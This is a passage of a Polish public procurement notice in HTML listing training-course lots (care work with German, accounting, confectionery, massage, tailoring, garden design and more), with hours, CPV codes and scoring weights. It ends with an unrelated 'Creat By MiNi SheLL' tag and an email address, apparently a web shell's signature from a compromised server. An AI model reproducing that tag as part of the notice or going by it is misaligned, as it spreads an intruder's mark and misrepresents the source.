</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekun osób starszych niepełnosprawnych + język niemiecki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 3 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 200, w tym 180 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Opieka nad ludźmi chorymi i starszymi, Opieka nad osobami niepełnosprawnymi, 	Opieka ambulatoryjna nad osobami w podeszłym wieku przebywającymi we własnych mieszkaniach lub ośrodkach mieszkaniowych dla seniorów, Pierwsza pomoc przedlekarska, Pielęgniarstwo, Rehabilitacja osób starszych i przewlekle chorych, Techniki prowadzenia rozmów w trudnych sytuacjach życiowych, Psychologia i pedagogika w opiece, Wybrane zagadnienia prawne z zakresu specjalistycznych usług opiekuńczych, Zagadnienia higieny osobistej oraz najbliższego środowiska, Podstawy dietetyki, Nauka języka niemieckiego: komunikacja, wymowa, pisanie, czytanie oraz podstawowe konstrukcje gramatyczne i najczęściej używane czasy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obsługa kasy fiskalnej + minimum sanitarne + książeczka zdrowia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 30, w tym 18 godzin zajęć praktycznych. 
 Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Podstawowe akty prawne związane ze stosowaniem kas fiskalnych, Budowa, zasady działania oraz podział urządzeń fiskalnych, Przygotowanie kasy do pracy, Sprzedaż,
Zwrot opakowań, System zapewniania bezpieczeństwa zdrowotnego żywności, HACCAP w sklepie, BHP, Dobra praktyka higieniczna GHP, Opis produktów oferowanych do sprzedaży, Sporządzanie dokumentacji (wykonywanie raportów, fakturowanie)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Księgowość + kadry - płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 200, w tym 120 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Podstawy prawne. Organizacja i funkcjonowanie firmy, Prawo pracy -kodeks pracy i zagadnienia kadrowe, Nawiązanie stosunku pracy, rodzaj umów o pracę, Dokumentacja zatrudnianego pracownika, Zasady rozwiązanie umów o pracę, Uprawnienia i obowiązki pracodawcy wobec zwolnionego pracownika,	Planowanie czasu pracy, urlopy wypoczynkowe, urlopy rodzicielskie, Odpowiedzialność prawna w stosunkach pracy, Odpowiedzialność pracodawcy za naruszenie przepisów prawa pracy, Płace, ubezpieczenia społeczne, Istota i sposób naliczania poszczególnych elementów listy płac, Ogólne zasady rachunkowości. Księgowość , finanse i analiza ekonomiczna, Księgowość wspomagana komputerem - obsługa programu SYMFONIA - Moduły księgowość, finanse, mała księgowość, kadry i płace, Obsługa programu płatnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Cukiernik + zdobienie tortów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 150, w tym 120 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: BHP, HACCP, technologia żywienia, zasady pracy w zawodzie cukiernika, Proces produkcji wyrobów cukierniczych i ciastkarskich - metody i etapy, Techniki wykonywania różnych wyrobów ciastkarskich, Metody sporządzania ciast, zasady przekładania ciast i ciastek nadzieniami, Poznanie surowców do sporządzania ciasta biszkoptowego oraz stosowanych dodatków, Sposoby sporządzania ciasta biszkoptowego (na ciepło i na zimno), Sporządzanie tortów o różnych kształtach i różnych spodach biszkoptowych np. kokosowym, orzechowym, makowym, czekoladowym i innych, Metody sporządzania mas, kremów, polew do ciast i tortów, Zasady zdobienia oraz dekorowania ciast i tortów, Sporządzanie dekoracji z masy marcepanowej (dekoracje kwiatowe i inne), Wykonanie tortu okolicznościowego, pisanie napisów czekoladą, Warunki przechowywania surowców, półproduktów i wyrobów gotowych, Przechowywanie i ekspedycja wyrobów cukierniczych i ciastkarskich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Masaż I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 120, w tym 100 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Podstawy anatomii i fizjologii, Wprowadzenie do masaży: pojęcie i cele masażu, historia masażu, rodzaje masaży, BHP masażysty, Oddziaływanie masażu na organizm, Teoria masażu klasycznego, wskazanie i przeciwwskazania, omówienie techniki masażu klasycznego i jego pochodnych:masaż sportowy, masaż relaksujący, masaż leczniczy, masaż limfatyczny, masaż odchudzający, masaż kosmetyczny,  masaż izometryczny, Praktyka masażu - zapoznanie się z chwytami poszczególnych technik masażu oraz ich doskonalenie na poszczególnych częściach ciała..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Profesjonalna sprzątaczka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 70, w tym 60 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Przepisy BHP na stanowisku pracy, Rodzaj obiektów i technologie ich sprzątania Rodzaje i typy podłóg, Oznakowanie i bezpieczne używanie środków chemicznych, Dobór środków czystości do sprzątanych powierzchni, Znajomość narzędzi i maszyn służących do sprzątania, Czyszczenie wykładzin i dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Usługi krawieckie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 107, w tym 80 godzin zajęć praktycznych. 
 Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Przepisy BHP, Materiałoznawstwo krawieckie, Szycie ręczne:nauka szycia ręcznego: fastryga, ścieg pętelkowy, sposoby przyszywania: zatrzaski, haftki, gumki itp., zapoznanie się z rodzajami dodatków krawieckich i pasmanteria, Nauka szycia na maszynie:budowa maszyny, nauka nawlekania nici i ustawiania ściegu,metody szycia na maszynie, szycie na maszynie z nićmi i na sucho, szycie spódnicy i spodni; robienie formy, krojenie, przygotowanie do miary, miara, wszywanie zamka, wykończenie, Wykroje, formy - dopasowanie do figury: nauka korzystania z żurnalowych wykrojów, przygotowanie szablonów, nauka krojenia, omówienie linii i płaszczyzn ciała, Nauka szycia na owerloku: nauka szycia na maszynie specjalistycznej owerlok, Szycie firan i zasłon..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Skuteczne techniki sprzedaży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 30, w tym 20 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Cechy idealnego handlowca, Komunikacja interpersonalna, techniki wzmocnienia przekazu, Techniki wywierania pozytywnego pierwszego wrażenia, Mowa ciała - wypracowanie prawidłowych technik wzmacniających postawę oraz jakich błędów nie należy popełniać, Techniki sprzedaży, Kreowanie potrzeb klienta, Doskonalenie sztuki prezentacji firmy, produktu lub usługi. Opracowanie efektywnej prezentacji produktu, Techniki sugestii - elementy wywierania wpływu na decyzje zakupowe, Typologia klienta - sztuka dopasowania, Negocjacje i obrona marży, Sposoby finalizacji rozmowy sprzedażowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Projektowanie ogrodów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 111, w tym 80 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Historia sztuki ogrodowej, Ocenianie terenu pod kątem jego przestrzennego zagospodarowania, dokonywanie odpowiednich pomiarów i sporządzanie planów, Określanie funkcji ogrodów, Zakładanie ogrodów, Wymagania różnych gatunków popularnych roślin stosowanych w ogrodach oraz ich uprawa, Projektowanie placów zabaw, Kosztorysowanie, Rysunek odręczny i wykreślany, ArchiCAD/Artlatis, Charakterystyka klientów i sztuka komunikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Profesjonalny doradca finansowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 112, w tym 60 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Przygotowanie warsztatu pracy doradcy finansowego; wyznaczenie obszaru rozwoju, planowanie działań, kreowanie wizerunku, 	Komunikacja interpersonalna + organizacja i zarządzanie czasem, Rodzaj kredytów i ich charakterystyka, Analiza zdolności kredytowej klienta do podpisania umowy kredytowej, Akcje, obligacje, fundusze inwestycyjne z elementami strategii inwestycyjnych, rozmowa handlowa, Przygotowanie sprzedażowe: prospecting, umawianie spotkań, analiza finansowa klienta, rekomendacje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Konsultant ślubny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba uczestników szkolenia - do 6 osób (osoby kierowane będą w formie indywidualnej).
Minimalna ilość godzin - ogółem 26, w tym 13 godzin zajęć praktycznych. 
Program szkolenia powinien zawierać w szczególności zagadnienia dotyczące: Podstawowe pojęcia, terminologia, Rola i obowiązki konsultanta ślubnego, Schemat działania konsultanta: omówienie możliwości działania pod kątem zarobkowym, Etapy kontaktu z klientem, Umowy i wynagrodzenia, oferta i jej sposób prezentacji, Dokumentacja: ankieta pierwszego kontaktu, kosztorys szacunkowy, kosztorys pomocniczy, kosztorys ostateczny, harmonogram działań, scenariusz, umowa z klientem, umowa z podwykonawcą, Koordynacja dnia ślubu i wesela, Wesela tematyczne, rodzaje ślubów, Podwykonawcy weselni: wyszukiwanie i weryfikacja podwykonawców, zasady współpracy, przykładowe cenniki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doswiadczenie kadry dydaktycznej - 10</li>
<li>3. Doświadczenie  wykonawcy - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com